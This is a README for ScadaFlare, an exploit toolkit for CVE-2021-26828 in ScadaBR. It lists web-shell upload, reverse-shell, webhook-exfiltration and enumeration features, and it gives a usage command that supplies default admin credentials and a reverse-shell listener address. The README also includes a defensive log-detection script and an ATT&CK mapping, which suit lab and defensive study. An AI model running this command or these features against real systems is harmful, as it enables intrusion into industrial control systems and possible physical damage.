ridpath/CVE-2021-26828-Ultimate
ScadaFlare - CVE-2021-26828 Authenticated RCE Exploitation Toolkit

License: MIT | Tested on: HTB Alchemy | Target: ScadaBR <1.1.0 | Platform: Linux/Windows

A modular post-auth RCE exploit targeting ScadaBR <1.1.0, enhanced for red team ops.

(Animated demo: ScadaFlare Demo)

Features

  • Uploads a weaponized .jsp web shell through the authenticated view_edit.shtm upload endpoint
  • Supports Linux and Windows payloads
  • SOCKS5 / HTTP proxy support
  • Reverse shell trigger (plain or base64-encoded command)
  • Enumeration modules (DB, credentials, Log4Shell, etc.)
  • Webhook exfiltration (Slack / Discord)
  • Metasploit resource script generation
  • Cleanup support (kill switch that removes the uploaded shell)
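
The feature list above describes the attack chain a defender will see on the ScadaBR server: an authenticated POST to view_edit.shtm that carries the .jsp, followed by requests to the uploaded file. The following detection script is an added example for this page and is not part of ScadaFlare or of the original PoC; it runs over constructed Apache/Tomcat combined-format access log lines and flags the upload-then-execute sequence per client IP. The /ScadaBR/uploads/ landing directory for the JSP is an assumption of this example, as is the ten-minute correlation window.

```python
"""Detect the CVE-2021-26828 upload-then-execute pattern in web access logs.

Added example, not part of the ScadaFlare project. Assumptions: the uploaded
JSP lands under /ScadaBR/uploads/ and the log is in combined format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/Tomcat combined log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The upload endpoint is named on the page; the landing directory is an assumption.
UPLOAD_PATH = "/ScadaBR/view_edit.shtm"
JSP_UNDER_UPLOADS = re.compile(r"^/ScadaBR/uploads/[^?]+\.jsp(\?.*)?$", re.IGNORECASE)

# Constructed sample log: one attacker chain, one later hit on the planted shell,
# and one benign request that must not be flagged.
SAMPLE_LOG = """\
10.10.14.44 - - [12/Mar/2024:10:01:02 +0000] "POST /ScadaBR/login.htm HTTP/1.1" 302 -
10.10.14.44 - - [12/Mar/2024:10:01:05 +0000] "GET /ScadaBR/view_edit.shtm HTTP/1.1" 200 18345
10.10.14.44 - - [12/Mar/2024:10:01:09 +0000] "POST /ScadaBR/view_edit.shtm HTTP/1.1" 200 18402
10.10.14.44 - - [12/Mar/2024:10:01:12 +0000] "GET /ScadaBR/uploads/1.jsp?cmd=id HTTP/1.1" 200 87
172.16.0.5 - - [12/Mar/2024:10:30:00 +0000] "GET /ScadaBR/uploads/1.jsp HTTP/1.1" 200 87
172.16.0.9 - - [12/Mar/2024:10:31:00 +0000] "GET /ScadaBR/views.shtm HTTP/1.1" 200 9000
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_webshell_chains(lines, window=timedelta(minutes=10)):
    """Return one finding per request to a .jsp under the uploads directory.

    A finding is marked chained=True when the same client IP POSTed to
    view_edit.shtm within `window` before the .jsp request (upload followed by
    execution). Unchained hits still matter: they are a shell planted earlier,
    or by another host, being reused.
    """
    uploads = defaultdict(list)  # ip -> timestamps of POSTs to the upload endpoint
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?")[0]
        if rec["method"] == "POST" and path == UPLOAD_PATH:
            uploads[rec["ip"]].append(rec["ts"])
        elif JSP_UNDER_UPLOADS.match(rec["path"]):
            recent = [t for t in uploads[rec["ip"]] if t <= rec["ts"] <= t + window]
            findings.append({
                "ip": rec["ip"],
                "shell": path,
                "ts": rec["ts"],
                "status": rec["status"],
                "chained": bool(recent),
            })
    return findings


if __name__ == "__main__":
    for f in find_webshell_chains(SAMPLE_LOG.splitlines()):
        tag = "upload+exec chain" if f["chained"] else "existing shell hit"
        print(f"{f['ts'].isoformat()} {f['ip']} {f['shell']} HTTP {f['status']} [{tag}]")
```

Tune `window` to the lab's realistic dwell time; the two-event chain is the high-confidence signal, while an unchained hit on a .jsp under uploads is worth an alert on its own because ScadaBR has no legitimate reason to serve JSP from an image-upload directory.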

MITRE ATT&CK Technique Mapping

| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Valid Accounts (the exploit requires ScadaBR credentials) | T1078 |
| Initial Access | Exploit Public-Facing Application | T1190 |
| Persistence | Server Software Component: Web Shell (the uploaded .jsp) | T1505.003 |
| Credential Access | Unsecured Credentials: Credentials In Files | T1552.001 |
| Discovery | Remote System Discovery | T1018 |
| Exfiltration | Exfiltration Over Web Service: Exfiltration Over Webhook (Slack / Discord) | T1567.004 |
| Command and Control | Proxy (SOCKS5 / HTTP proxy support) | T1090 |

Command execution through the uploaded shell falls under T1505.003; ATT&CK has no separate "Modify Web Content" technique, and T1090 Proxy belongs to the Command and Control tactic rather than Defense Evasion.

CVE

  • CVE-2021-26828
  • Discovered by Fellipe Oliveira
  • Exploit enhanced & modularized

Why This Exists

This exploit was developed during analysis of the HTB Pro Lab: Alchemy scenario. The original PoC by Fellipe Oliveira was solid but:

  • Written in Python 2
  • Lacked modern features such as proxy support, shell cleanup and enumeration chaining
  • Was difficult to extend or integrate into red team workflows

This version, ScadaFlare, is a full rewrite in Python 3 with modular support, multiple evasion strategies, an OS-detection override, webhook integration, SOCKS proxy support, and enumeration chains for real-world operator use.

Usage

The three positional arguments are the target base URL and the ScadaBR username and password (admin/admin is the product's default account); --reverse-ip and --reverse-port set the listener for the reverse shell, and --cleanup removes the uploaded shell when the session ends.

python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Legal & Ethical Use Only

ScadaFlare is designed solely for:

  • Ethical hacking education
  • SCADA lab testing
  • Defensive research & vulnerability validation

Unauthorized use against real industrial systems can:

  • Disrupt physical processes
  • Cause damage or safety hazards
  • Result in severe legal consequences

By using this tool you accept full responsibility for:

  • Obtaining explicit written authorization
  • Operating only within approved environments

License

MIT License – see LICENSE
